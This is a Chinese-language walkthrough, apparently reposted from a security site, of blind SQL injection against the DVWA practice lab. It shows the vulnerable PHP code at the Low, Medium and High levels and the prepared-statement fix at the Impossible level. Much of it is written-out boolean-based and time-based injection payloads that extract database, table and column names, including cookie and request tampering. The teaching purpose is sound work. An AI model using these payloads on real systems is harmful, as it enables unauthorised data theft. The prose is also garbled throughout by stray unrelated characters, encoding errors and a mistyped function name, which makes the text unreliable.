————SQL Injection——(Blind)——

SQL Injection（Blind）歪沃，即SQL盲注轿钠，與一般注入的區(qū)別在于竣稽，一般的注入攻擊者可以直接從頁面上看到注入語句的執(zhí)行結(jié)果隆嗅，而盲注時攻擊者通常是無法從顯示頁面上獲取執(zhí)行結(jié)果，甚至連注入語句是否執(zhí)行都無從得知令漂，因此盲注的難度要比一般注入高。目前網(wǎng)絡上現(xiàn)存的SQL注入漏洞大多是SQL盲注丸边。

DVWA-1.9系列一共分為10個功能模塊：

Brute Force（暴力破解）

Command Injection（命令行注入）

CSRF（跨站請求偽造）

File Inclusion（文件包含）

File Upload（文件上傳）

Insecure CAPTCHA（不安全的驗證碼）

SQL Injection（SQL注入）

SQL Injection（Blind）（SQL盲注）

XSS（Reflected）（反射型跨站腳本）

XSS（Stored）（存儲型跨站腳本）

————手工————盲注————思路————

手工盲注的過程洗显，就像你與一個機器人聊天，這個機器人知道的很多原环，但只會回答“是”或者“不是”挠唆，因此你需要詢問它這樣的問題，例如“數(shù)據(jù)庫名字的第一個字母是不是a爸雎稹玄组？”滔驾，通過這種機械的詢問，最終獲得你想要的數(shù)據(jù)俄讹。

盲注分為基于布爾的盲注哆致、基于時間的盲注以及基于報錯的盲注，這里由于實驗環(huán)境的限制患膛，只演示基于布爾的盲注與基于時間的盲注摊阀。

下面簡要介紹手工盲注的步驟（可與之前的手工注入作比較）：

1.判斷是否存在注入，注入是字符型還是數(shù)字型

2.猜解當前數(shù)據(jù)庫名

3.猜解數(shù)據(jù)庫中的表名

4.猜解表中的字段名

5.猜解數(shù)據(jù)

下面對四種級別的代碼進行分析踪蹬。

————Low————

服務器端核心代碼

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}

?> 

可以看到胞此，Low級別的代碼對參數(shù)id沒有做任何檢查、過濾跃捣，存在明顯的SQL注入漏洞漱牵，同時SQL語句查詢返回的結(jié)果只有兩種，‘

User ID exists in the database.

‘與‘

`User ID is MISSING from the database.`

‘疚漆，因此這里是SQL盲注漏洞肺魁。

————漏洞利用————

首先演示————基于布爾的盲注————：

1.判斷是否存在注入催蝗，注入是字符型還是數(shù)字型

輸入1，顯示相應用戶存在：

1.png

輸入1’ and 1=1 #，顯示存在：

1.png

輸入1’ and 1=2 #劫拢，顯示不存在：

1.png

說明存在字符型的SQL盲注滚澜。

2.猜解當前數(shù)據(jù)庫名

想要猜解數(shù)據(jù)庫名晌梨，首先要猜解數(shù)據(jù)庫名的長度中跌，然后挨個猜解字符。

輸入1’ and length(database())=1 #发钝，顯示不存在顿涣；

輸入1’ and length(database())=2 #，顯示不存在酝豪；

輸入1’ and length(database())=3 #涛碑，顯示不存在；

輸入1’ and length(database())=4 #孵淘，顯示存在：

說明數(shù)據(jù)庫名長度為4蒲障。

下面采用二分法猜解數(shù)據(jù)庫名。

輸入1’ and ascii(substr(databse(),1,1))>97 #瘫证，顯示存在揉阎，說明數(shù)據(jù)庫名的第一個字符的ascii值大于97（小寫字母a的ascii值）；

輸入1’ and ascii(substr(databse(),1,1))<122 #背捌，顯示存在毙籽，說明數(shù)據(jù)庫名的第一個字符的ascii值小于122（小寫字母z的ascii值）；

輸入1’ and ascii(substr(databse(),1,1))<109 #毡庆，顯示存在坑赡，說明數(shù)據(jù)庫名的第一個字符的ascii值小于109（小寫字母m的ascii值）烙如；

輸入1’ and ascii(substr(databse(),1,1))<103 #，顯示存在毅否，說明數(shù)據(jù)庫名的第一個字符的ascii值小于103（小寫字母g的ascii值）亚铁；

輸入1’ and ascii(substr(databse(),1,1))<100 #，顯示不存在螟加，說明數(shù)據(jù)庫名的第一個字符的ascii值不小于100（小寫字母d的ascii值）徘溢；

輸入1’ and ascii(substr(databse(),1,1))>100 #，顯示不存在捆探，說明數(shù)據(jù)庫名的第一個字符的ascii值不大于100（小寫字母d的ascii值）然爆，所以數(shù)據(jù)庫名的第一個字符的ascii值為100，即小寫字母d徐许。

…

重復上述步驟，就可以猜解出完整的數(shù)據(jù)庫名（dvwa）了卒蘸。

3.猜解數(shù)據(jù)庫中的表名

首先猜解數(shù)據(jù)庫中表的數(shù)量：

1’ and (select count (table_name) from information_schema.tables where table_schema=database())=1 # 顯示不存在

1’ and (select count (table_name) from information_schema.tables where table_schema=database() )=2 # 顯示存在

說明數(shù)據(jù)庫中共有兩個表雌隅。

接著挨個猜解表名：

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 顯示不存在

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # 顯示不存在

…

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 顯示存在

說明第一個表名長度為9。

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 顯示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 顯示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 # 顯示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # 顯示不存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # 顯示不存在

說明第一個表的名字的第一個字符為小寫字母g缸沃。

…

重復上述步驟恰起，即可猜解出兩個表名（guestbook、users）趾牧。

4.猜解表中的字段名

首先猜解表中字段的數(shù)量：

1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=1 # 顯示不存在

1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8 # 顯示存在

說明users表有8個字段检盼。

接著挨個猜解字段名：

1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1 # 顯示不存在

1’ and length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7 # 顯示存在

說明users表的第一個字段為7個字符長度。

采用二分法翘单，即可猜解出所有字段名吨枉。

5.猜解數(shù)據(jù)

同樣采用二分法。

還可以使用————基于時間的盲注————：

1.判斷是否存在注入哄芜，注入是字符型還是數(shù)字型

輸入1’ and sleep(5) #貌亭，感覺到明顯延遲；

輸入1 and sleep(5) #认臊，沒有延遲圃庭；

說明存在字符型的基于時間的盲注。

2.猜解當前數(shù)據(jù)庫名

首先猜解數(shù)據(jù)名的長度：

1’ and if(length(database())=1,sleep(5),1) # 沒有延遲

1’ and if(length(database())=2,sleep(5),1) # 沒有延遲

1’ and if(length(database())=3,sleep(5),1) # 沒有延遲

1’ and if(length(database())=4,sleep(5),1) # 明顯延遲

說明數(shù)據(jù)庫名長度為4個字符失晴。

接著采用二分法猜解數(shù)據(jù)庫名：

1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 明顯延遲

1’ and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 沒有延遲

1’ and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 沒有延遲

說明數(shù)據(jù)庫名的第一個字符為小寫字母d剧腻。

…

重復上述步驟，即可猜解出數(shù)據(jù)庫名涂屁。

3.猜解數(shù)據(jù)庫中的表名

首先猜解數(shù)據(jù)庫中表的數(shù)量：

1’ and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 沒有延遲

1’ and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明顯延遲

說明數(shù)據(jù)庫中有兩個表书在。

接著挨個猜解表名：

1’ and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 沒有延遲

…

1’ and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明顯延遲

說明第一個表名的長度為9個字符。

采用二分法即可猜解出表名拆又。

4.猜解表中的字段名

首先猜解表中字段的數(shù)量：

1’ and if((select count(column_name) from information_schema.columns where table_name= ’users’)=1,sleep(5),1)# 沒有延遲

…

1’ and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# 明顯延遲

說明users表中有8個字段蕊温。

接著挨個猜解字段名：

1’ and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1,sleep(5),1) # 沒有延遲

…

1’ and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明顯延遲

說明users表的第一個字段長度為7個字符袱箱。

采用二分法即可猜解出各個字段名。

5.猜解數(shù)據(jù)

同樣采用二分法义矛。

————Medium————

服務器端核心代碼

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    //mysql_close();
}

?> 

可以看到发笔，Medium級別的代碼利用mysql_real_escape_string函數(shù)對特殊符號

\x00,\n,\r,,’,”,\x1a進行轉(zhuǎn)義，同時前端頁面設置了下拉選擇表單凉翻，希望以此來控制用戶的輸入了讨。

1.png

————漏洞利用————

雖然前端使用了下拉選擇菜單，但我們依然可以通過抓包改參數(shù)id制轰，提交惡意構(gòu)造的查詢參數(shù)前计。

之前已經(jīng)介紹了詳細的盲注流程，這里就簡要演示幾個垃杖。

首先是————基于布爾的盲注————：

抓包改參數(shù)id為1 and length(database())=4 #男杈，顯示存在，說明數(shù)據(jù)庫名的長度為4個字符调俘；

抓包改參數(shù)id為1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #伶棒，顯示存在，說明數(shù)據(jù)中的第一個表名長度為9個字符彩库；

抓包改參數(shù)id為1 and (select count(column_name) from information_schema.columns where table_name= 0×7573657273)=8 #肤无，（0×7573657273為users的16進制），顯示存在骇钦，說明uers表有8個字段宛渐。

然后是————基于時間的盲注————：

抓包改參數(shù)id為1 and if(length(database())=4,sleep(5),1) #，明顯延遲眯搭，說明數(shù)據(jù)庫名的長度為4個字符窥翩；

抓包改參數(shù)id為1 and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #，明顯延遲鳞仙，說明數(shù)據(jù)中的第一個表名長度為9個字符鳍烁；

抓包改參數(shù)id為1 and if((select count(column_name) from information_schema.columns where table_name=0×7573657273 )=8,sleep(5),1) #，明顯延遲繁扎，說明uers表有8個字段幔荒。

————High————

服務器端核心代碼

<?php

if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }

        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}

?> 

可以看到，High級別的代碼利用cookie傳遞參數(shù)id梳玫，當SQL查詢結(jié)果為空時爹梁，會執(zhí)行函數(shù)sleep(seconds)，目的是為了擾亂基于時間的盲注提澎。同時在 SQL查詢語句中添加了LIMIT 1姚垃，希望以此控制只輸出一個結(jié)果。

————漏洞利用————

雖然添加了LIMIT 1盼忌，但是我們可以通過#將其注釋掉积糯。但由于服務器端執(zhí)行sleep函數(shù)掂墓，會使得基于時間盲注的準確性受到影響，這里我們只演示基于布爾的盲注：

抓包將cookie中參數(shù)id改為1’ and length(database())=4 #看成，顯示存在君编，說明數(shù)據(jù)庫名的長度為4個字符；

抓包將cookie中參數(shù)id改為1’ and length(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #川慌，顯示存在吃嘿，說明數(shù)據(jù)中的第一個表名長度為9個字符；

抓包將cookie中參數(shù)id改為1’ and (select count(column_name) from information_schema.columns where table_name=0×7573657273)=8 #梦重，（0×7573657273 為users的16進制）兑燥，顯示存在，說明uers表有8個字段琴拧。

Impossible

服務器端核心代碼

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

        // Get results
        if( $data->rowCount() == 1 ) {
            // Feedback for end user
            echo '<pre>User ID exists in the database.</pre>';
        }
        else {
            // User wasn't found, so the page wasn't!
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

            // Feedback for end user
            echo '<pre>User ID is MISSING from the database.</pre>';
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?> 

可以看到降瞳，Impossible級別的代碼采用了PDO技術(shù)，劃清了代碼與數(shù)據(jù)的界限蚓胸，有效防御SQL注入挣饥，Anti-CSRF token機制的加入了進一步提高了安全性
轉(zhuǎn)載地址：http://www.freebuf.com/articles/web/120985.html